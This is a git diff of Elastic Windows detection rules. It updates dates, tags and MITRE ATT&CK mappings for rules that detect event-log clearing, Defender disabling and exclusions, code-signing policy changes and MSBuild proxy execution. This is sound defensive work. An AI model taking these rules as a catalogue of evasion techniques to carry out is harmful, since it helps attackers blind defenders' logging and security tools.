"2026/03/23" [rule] author = ["Elastic"] @@ -96,34 +96,18 @@ event.code : "4719" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.001" -name = "Clear Windows Event Logs" -reference = "https://attack.mitre.org/techniques/T1070/001/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml index f05d40e1010..7e23d925997 100644 --- a/rules/windows/defense_evasion_clearing_windows_console_history.toml +++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/22" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -64,21 +64,7 @@ references = [ risk_score = 47 rule_id = "b5877334-677f-4fb9-86d5-a9721274223b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -101,36 +87,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.003" name = "Clear Command History" reference = "https://attack.mitre.org/techniques/T1070/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index c2f04f5a873..942482a1f80 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,24 +98,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml index 7e89e09c3a2..f8fae831aa8 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -126,24 +126,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" + [[rule.threat.technique.subtechnique]] id = "T1553.006" name = "Code Signing Policy Modification" reference = "https://attack.mitre.org/techniques/T1553/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index bbf8c289d02..90f5cb482fd 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,17 +18,7 @@ name = "Suspicious Communication App Child Process" risk_score = 47 rule_id = "adbfa3ee-777e-4747-b6b0-7bd645f30880" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" @@ -237,41 +227,31 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml index 6194cfb8572..14fbccc9270 100644 --- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,6 +108,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -117,20 +118,13 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml index 0666acac376..bfa1d4320b9 100644 --- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml +++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,41 +108,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml index 8a2c924a761..918d32f3d95 100644 --- a/rules/windows/defense_evasion_disabling_windows_logs.toml +++ b/rules/windows/defense_evasion_disabling_windows_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/06" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Ivan Ninichuck", "Austin Songer"] @@ -103,34 +103,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.001" -name = "Clear Windows Event Logs" -reference = "https://attack.mitre.org/techniques/T1070/001/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index e6b5d148708..4d1b9d2f617 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,21 +63,7 @@ note = """## Triage and analysis risk_score = 47 rule_id = "201200f1-a99b-43fb-88ed-f65a45c4972c" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -90,36 +76,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml index f5b76cd15e6..36fa31a2960 100644 --- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/08" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,21 +64,7 @@ references = ["https://www.joesandbox.com/analysis/476188/1/html"] risk_score = 73 rule_id = "416697ae-e468-4093-a93d-59661fa619ec" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,19 +86,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.002" name = "Control Panel" reference = "https://attack.mitre.org/techniques/T1218/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 2cc57b1fcb1..59086cf0516 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -106,21 +106,7 @@ references = ["https://dtm.uk/wuauclt/"] risk_score = 47 rule_id = "edf8ee23-5ea7-4123-ba19-56b41e424ae3" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -138,14 +124,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 93810f62173..15868ad4ecf 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,21 +85,7 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 73 rule_id = "c5dc3223-13a2-44a2-946c-e9dc0aa0449c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -119,26 +105,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 078583b84ea..34687a32d2b 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,16 +54,7 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -87,49 +78,21 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index c2e91fd6574..6992af6d0a0 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,21 +64,7 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,26 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml index 084e10613d6..75f254895c1 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -102,19 +102,7 @@ This rule checks for renamed instances of MSBuild, which can indicate an attempt risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -127,29 +115,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index ba363f8f52b..2f5cda9c602 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,17 +66,7 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -88,32 +78,31 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml index 